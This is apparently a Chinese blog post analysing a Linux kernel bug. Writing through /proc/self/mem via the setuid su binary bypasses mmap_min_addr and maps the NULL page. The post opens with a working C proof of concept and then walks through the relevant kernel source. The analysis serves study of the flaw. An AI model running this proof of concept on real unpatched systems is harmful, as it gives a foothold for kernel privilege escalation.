看了许多关于这个漏洞的文章,这里进行一下自我总结

参考:https://cert.360.cn/report/detail?id=58e8387ec4c79693354d4797871536ea

Poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>

int main(void) {
void *map = mmap((void*)0x10000, 0x1000, PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_GROWSDOWN|MAP_FIXED, -1, 0);
if (map == MAP_FAILED) err(1, "mmap");
int fd = open("/proc/self/mem", O_RDWR);
if (fd == -1) err(1, "open");
unsigned long addr = (unsigned long)map;
while (addr != 0) {
addr -= 0x1000;
if (lseek(fd, addr, SEEK_SET) == -1) err(1, "lseek");
char cmd[1000];
sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
system(cmd);
}
system("head -n1 /proc/$PPID/maps");
printf("data at NULL: 0x%lx\n", *(unsigned long *)0);
}

首先mmap一页内存,以0x10000为地址,然后打开/proc/self/mem文件,该文件所映射的是当前进程的内存,相对文件的偏移对应的是进程的地址

之后进入while循环,一页一页的利用漏洞向前请求内存,最后从0到0x11000的内存都可以被映射

跟进分析

文件写相关函数在此定义:

1
2
3
4
5
6
7
static const struct file_operations proc_mem_operations = {
.llseek = mem_lseek,
.read = mem_read,
.write = mem_write,
.open = mem_open,
.release = mem_release,
};

直接看mem_write

1
2
3
4
5
static ssize_t mem_write(struct file *file, const char __user *buf,
size_t count, loff_t *ppos)
{
return mem_rw(file, (char __user*)buf, count, ppos, 1);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
static ssize_t mem_rw(struct file *file, char __user *buf,
size_t count, loff_t *ppos, int write)
{
struct mm_struct *mm = file->private_data;
unsigned long addr = *ppos;
ssize_t copied;
char *page;
unsigned int flags;

if (!mm)
return 0;

page = (char *)__get_free_page(GFP_TEMPORARY);
if (!page)
return -ENOMEM;

copied = 0;
if (!atomic_inc_not_zero(&mm->mm_users))
goto free;

/* Maybe we should limit FOLL_FORCE to actual ptrace users? */
flags = FOLL_FORCE;
if (write)
flags |= FOLL_WRITE;

while (count > 0) {
int this_len = min_t(int, count, PAGE_SIZE);

if (write && copy_from_user(page, buf, this_len)) { //这里从buf复制到page中
copied = -EFAULT;
break;
}

this_len = access_remote_vm(mm, addr, page, this_len, flags);//addr就是我们Poc中的addr,this_len就是我们输入的大小
if (!this_len) {
if (!copied)
copied = -EIO;
break;
}

if (!write && copy_to_user(buf, page, this_len)) {
copied = -EFAULT;
break;
}

buf += this_len;
addr += this_len;
copied += this_len;
count -= this_len;
}
*ppos = addr;

mmput(mm);
free:
free_page((unsigned long) page);
return copied;
}

对文件写所涉及的操作就是如上注释那两个,先从buf复制到page中,然后再把page中的数据写入另一个进程中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/**
* access_remote_vm - access another process' address space
* @mm: the mm_struct of the target address space
* @addr: start address to access
* @buf: source or destination buffer
* @len: number of bytes to transfer
* @gup_flags: flags modifying lookup behaviour
*
* The caller must hold a reference on @mm.
*/
int access_remote_vm(struct mm_struct *mm, unsigned long addr,
void *buf, int len, unsigned int gup_flags)
{
return __access_remote_vm(NULL, mm, addr, buf, len, gup_flags);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
/*
* Access another process' address space as given in mm. If non-NULL, use the
* given task for page fault accounting.
*/
int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
unsigned long addr, void *buf, int len, unsigned int gup_flags)
{
struct vm_area_struct *vma;
void *old_buf = buf;
int write = gup_flags & FOLL_WRITE;

down_read(&mm->mmap_sem);
/* ignore errors, just check how much was successfully transferred */
while (len) {
int bytes, ret, offset;
void *maddr;
struct page *page = NULL;

ret = get_user_pages_remote(tsk, mm, addr, 1,
gup_flags, &page, &vma, NULL);//将另一个进程从addr开始之后的1个页固定到内存中,并将他们的指针写入&page中
if (ret <= 0) {
#ifndef CONFIG_HAVE_IOREMAP_PROT
break;
#else
/*
* Check if this is a VM_IO | VM_PFNMAP VMA, which
* we can access using slightly different code.
*/
vma = find_vma(mm, addr);
if (!vma || vma->vm_start > addr)
break;
if (vma->vm_ops && vma->vm_ops->access)
ret = vma->vm_ops->access(vma, addr, buf,
len, write);
if (ret <= 0)
break;
bytes = ret;
#endif
} else {
bytes = len;
offset = addr & (PAGE_SIZE-1);
if (bytes > PAGE_SIZE-offset)
bytes = PAGE_SIZE-offset;

maddr = kmap(page);//用kmap把page映射出来
if (write) {
copy_to_user_page(vma, page, addr,
maddr + offset, buf, bytes);
set_page_dirty_lock(page);//其实就相当于,memcpy(maddr+offset, buf, bytes)
} else {
copy_from_user_page(vma, page, addr,
buf, maddr + offset, bytes);
}
kunmap(page);
put_page(page);
}
len -= bytes;
buf += bytes;
addr += bytes;
}
up_read(&mm->mmap_sem);

return buf - old_buf;
}

之后的关键点在get_user_pages_remote中,这个函数顺利完成我们才能调用kmap将地址映射出来

1
2
3
4
5
6
7
8
9
10
long get_user_pages_remote(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *locked)
{
return __get_user_pages_locked(tsk, mm, start, nr_pages, pages, vmas,
locked, true,
gup_flags | FOLL_TOUCH | FOLL_REMOTE);
}
EXPORT_SYMBOL(get_user_pages_remote);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
static __always_inline long __get_user_pages_locked(struct task_struct *tsk,
struct mm_struct *mm,
unsigned long start,
unsigned long nr_pages,
struct page **pages,
struct vm_area_struct **vmas,
int *locked, bool notify_drop,
unsigned int flags)
{
long ret, pages_done;
bool lock_dropped;

if (locked) {
/* if VM_FAULT_RETRY can be returned, vmas become invalid */
BUG_ON(vmas);
/* check caller initialized locked */
BUG_ON(*locked != 1);
}

if (pages)
flags |= FOLL_GET;

pages_done = 0;
lock_dropped = false;
for (;;) {
ret = __get_user_pages(tsk, mm, start, nr_pages, flags, pages,
vmas, locked);//将另一个进程从addr开始之后的1个页固定到内存中,并将他们的指针写入&page中,返回固定的页数
if (!locked)
/* VM_FAULT_RETRY couldn't trigger, bypass */
return ret;

/* VM_FAULT_RETRY cannot return errors */
if (!*locked) {
BUG_ON(ret < 0);
BUG_ON(ret >= nr_pages);
}

if (!pages)
/* If it's a prefault don't insist harder */
return ret;

if (ret > 0) {
nr_pages -= ret;
pages_done += ret;
if (!nr_pages)
break;
}
if (*locked) {
/* VM_FAULT_RETRY didn't trigger */
if (!pages_done)
pages_done = ret;
break;
}
/* VM_FAULT_RETRY triggered, so seek to the faulting offset */
pages += ret;
start += ret << PAGE_SHIFT;

/*
* Repeat on the address that fired VM_FAULT_RETRY
* without FAULT_FLAG_ALLOW_RETRY but with
* FAULT_FLAG_TRIED.
*/
*locked = 1;
lock_dropped = true;
down_read(&mm->mmap_sem);
ret = __get_user_pages(tsk, mm, start, 1, flags | FOLL_TRIED,
pages, NULL, NULL);
if (ret != 1) {
BUG_ON(ret > 1);
if (!pages_done)
pages_done = ret;
break;
}
nr_pages--;
pages_done++;
if (!nr_pages)
break;
pages++;
start += PAGE_SIZE;
}
if (notify_drop && lock_dropped && *locked) {
/*
* We must let the caller know we temporarily dropped the lock
* and so the critical section protected by it was lost.
*/
up_read(&mm->mmap_sem);
*locked = 0;
}
return pages_done;
}

这里其实没太懂为啥两次__get_user_pages

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
unsigned long start, unsigned long nr_pages,
unsigned int gup_flags, struct page **pages,
struct vm_area_struct **vmas, int *nonblocking)
{
long i = 0;
unsigned int page_mask;
struct vm_area_struct *vma = NULL;

if (!nr_pages)
return 0;

VM_BUG_ON(!!pages != !!(gup_flags & FOLL_GET));

/*
* If FOLL_FORCE is set then do not force a full fault as the hinting
* fault information is unrelated to the reference behaviour of a task
* using the address space
*/
if (!(gup_flags & FOLL_FORCE))
gup_flags |= FOLL_NUMA;

do {
struct page *page;
unsigned int foll_flags = gup_flags;
unsigned int page_increm;

/* first iteration or cross vma bound */
if (!vma || start >= vma->vm_end) {
vma = find_extend_vma(mm, start); //查找vma
if (!vma && in_gate_area(mm, start)) {
int ret;
ret = get_gate_page(mm, start & PAGE_MASK,
gup_flags, &vma,
pages ? &pages[i] : NULL);
if (ret)
return i ? : ret;
page_mask = 0;
goto next_page;
}

if (!vma || check_vma_flags(vma, gup_flags))
return i ? : -EFAULT;
if (is_vm_hugetlb_page(vma)) {
i = follow_hugetlb_page(mm, vma, pages, vmas,
&start, &nr_pages, i,
gup_flags);
continue;
}
}
retry:
/*
* If we have a pending SIGKILL, don't keep faulting pages and
* potentially allocating memory.
*/
if (unlikely(fatal_signal_pending(current)))
return i ? i : -ERESTARTSYS;
cond_resched();
page = follow_page_mask(vma, start, foll_flags, &page_mask); //从用户空间地址即start查找页面描述符
if (!page) {
int ret;
ret = faultin_page(tsk, vma, start, &foll_flags,
nonblocking);
switch (ret) {
case 0:
goto retry;
case -EFAULT:
case -ENOMEM:
case -EHWPOISON:
return i ? i : ret;
case -EBUSY:
return i;
case -ENOENT:
goto next_page;
}
BUG();
} else if (PTR_ERR(page) == -EEXIST) {
/*
* Proper page table entry exists, but no corresponding
* struct page.
*/
goto next_page;
} else if (IS_ERR(page)) {
return i ? i : PTR_ERR(page);
}
if (pages) {
pages[i] = page;
flush_anon_page(vma, page, start);
flush_dcache_page(page);
page_mask = 0;
}
next_page:
if (vmas) {
vmas[i] = vma;
page_mask = 0;
}
page_increm = 1 + (~(start >> PAGE_SHIFT) & page_mask);
if (page_increm > nr_pages)
page_increm = nr_pages;
i += page_increm;
start += page_increm * PAGE_SIZE;
nr_pages -= page_increm;
} while (nr_pages);
return i;
}

find_extend_vma函数用来查找vma

似乎因为CONFIG_STACK_GROWSUP配置的定义与否,会用两种不同的find_extend_vma函数

这里我们所需要的函数是未定义CONFIG_STACK_GROWSUP配置的那个函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
struct vm_area_struct *
find_extend_vma(struct mm_struct *mm, unsigned long addr)
{
struct vm_area_struct *vma;
unsigned long start;

addr &= PAGE_MASK;
vma = find_vma(mm, addr); //查找对应的vma
if (!vma)
return NULL;
if (vma->vm_start <= addr)
return vma;
if (!(vma->vm_flags & VM_GROWSDOWN))
return NULL;
start = vma->vm_start;
if (expand_stack(vma, addr)) //走到这里是因为addr不在任何已存的vma的范围内,就需要扩展vma
return NULL;
if (vma->vm_flags & VM_LOCKED)
populate_vma_page_range(vma, addr, start, NULL);
return vma;
}
1
2
3
4
5
6
7
8
9
10
11
12
int expand_stack(struct vm_area_struct *vma, unsigned long address)
{
struct vm_area_struct *prev;

address &= PAGE_MASK;
prev = vma->vm_prev;
if (prev && prev->vm_end == address) {
if (!(prev->vm_flags & VM_GROWSDOWN))
return -ENOMEM;
}
return expand_downwards(vma, address); //主要是这个函数
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
int expand_downwards(struct vm_area_struct *vma,
unsigned long address)
{
struct mm_struct *mm = vma->vm_mm;
int error;

address &= PAGE_MASK;
error = security_mmap_addr(address); //漏洞就在这个函数里面
if (error)
return error;

/* We must make sure the anon_vma is allocated. */
if (unlikely(anon_vma_prepare(vma)))
return -ENOMEM;

/*
* vma->vm_start/vm_end cannot change under us because the caller
* is required to hold the mmap_sem in read mode. We need the
* anon_vma lock to serialize against concurrent expand_stacks.
*/
anon_vma_lock_write(vma->anon_vma);

/* Somebody else might have raced and expanded it already */
if (address < vma->vm_start) {
unsigned long size, grow;

size = vma->vm_end - address;
grow = (vma->vm_start - address) >> PAGE_SHIFT;

error = -ENOMEM;
if (grow <= vma->vm_pgoff) {
error = acct_stack_growth(vma, size, grow);
if (!error) {
/*
* vma_gap_update() doesn't support concurrent
* updates, but we only hold a shared mmap_sem
* lock here, so we need to protect against
* concurrent vma expansions.
* anon_vma_lock_write() doesn't help here, as
* we don't guarantee that all growable vmas
* in a mm share the same root anon vma.
* So, we reuse mm->page_table_lock to guard
* against concurrent vma expansions.
*/
spin_lock(&mm->page_table_lock);
if (vma->vm_flags & VM_LOCKED)
mm->locked_vm += grow;
vm_stat_account(mm, vma->vm_flags, grow);
anon_vma_interval_tree_pre_update_vma(vma);
vma->vm_start = address;
vma->vm_pgoff -= grow;
anon_vma_interval_tree_post_update_vma(vma);
vma_gap_update(vma);
spin_unlock(&mm->page_table_lock);

perf_event_mmap(vma);
}
}
}
anon_vma_unlock_write(vma->anon_vma);
khugepaged_enter_vma_merge(vma, vma->vm_flags);
validate_mm(mm);
return error;
}

漏洞就在security_mmap_addr函数里

1
2
3
4
static inline int security_mmap_addr(unsigned long addr)
{
return cap_mmap_addr(addr); //检查是否能mmap指定的addr,其实就是对addr的合法性检查
}
1
2
3
4
5
6
7
8
9
10
11
12
13
int cap_mmap_addr(unsigned long addr)
{
int ret = 0;

if (addr < dac_mmap_min_addr) {
ret = cap_capable(current_cred(), &init_user_ns, CAP_SYS_RAWIO,
SECURITY_CAP_AUDIT); //确定任务是否有特定的有效性,即确定任务是否有权限可以被执行
/* set PF_SUPERPRIV if it turns out we allow the low mmap */
if (ret == 0)
current->flags |= PF_SUPERPRIV;
}
return ret;
}

如果按照Poc运行的话,由于su是一个suid程序,故在运行它的时候权限会被提到su的所有者即root权限,那么这里current_cred()返回的就是rootcred,所以这里的检查一定会过

这里的检查一过,那么我们所请求的内存空间就会被顺利的申请出来

所以,我们本身先设置FILE结构体中的指针指向我们所请求的对普通用户而言不合法的地址,例如0x9000,然后用su的输出来FILE进行写操作,经过一系列检查,最终申请出来vma并映射这些地址到内存,感觉上类似缺页之后分配页但实际不是

vma

vmaVirtual Memory Area

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
struct vm_area_struct {
/* The first cache line has the info for VMA tree walking. */

unsigned long vm_start; /* Our start address within vm_mm. */
unsigned long vm_end; /* The first byte after our end address
within vm_mm. */

/* linked list of VM areas per task, sorted by address */
struct vm_area_struct *vm_next, *vm_prev;

struct rb_node vm_rb;

/*
* Largest free memory gap in bytes to the left of this VMA.
* Either between this VMA and vma->vm_prev, or between one of the
* VMAs below us in the VMA rbtree and its ->vm_prev. This helps
* get_unmapped_area find a free area of the right size.
*/
unsigned long rb_subtree_gap;

/* Second cache line starts here. */

struct mm_struct *vm_mm; /* The address space we belong to. */
pgprot_t vm_page_prot; /* Access permissions of this VMA. */
unsigned long vm_flags; /* Flags, see mm.h. */

/*
* For areas with an address space and backing store,
* linkage into the address_space->i_mmap interval tree.
*/
struct {
struct rb_node rb;
unsigned long rb_subtree_last;
} shared;

/*
* A file's MAP_PRIVATE vma can be in both i_mmap tree and anon_vma
* list, after a COW of one of the file pages. A MAP_SHARED vma
* can only be in the i_mmap tree. An anonymous MAP_PRIVATE, stack
* or brk vma (with NULL file) can only be in an anon_vma list.
*/
struct list_head anon_vma_chain; /* Serialized by mmap_sem &
* page_table_lock */
struct anon_vma *anon_vma; /* Serialized by page_table_lock */

/* Function pointers to deal with this struct. */
const struct vm_operations_struct *vm_ops;

/* Information about our backing store: */
unsigned long vm_pgoff; /* Offset (within vm_file) in PAGE_SIZE
units */
struct file * vm_file; /* File we map to (can be NULL). */
void * vm_private_data; /* was vm_pte (shared mem) */

#ifndef CONFIG_MMU
struct vm_region *vm_region; /* NOMMU mapping region */
#endif
#ifdef CONFIG_NUMA
struct mempolicy *vm_policy; /* NUMA policy for the VMA */
#endif
struct vm_userfaultfd_ctx vm_userfaultfd_ctx;
};

This struct defines a memory VMM memory area. There is one of these per VM-area/task. A VM area is any part of the process virtual memory space that has a special rule for the page-fault handlers (ie a shared library, the executable area etc).

总结

这个漏洞的原因并不复杂,是suid程序引发的问题,但是一路分析过来却比较困难,因为对类似vmamm等变量的了解不够,导致分析起来比较困难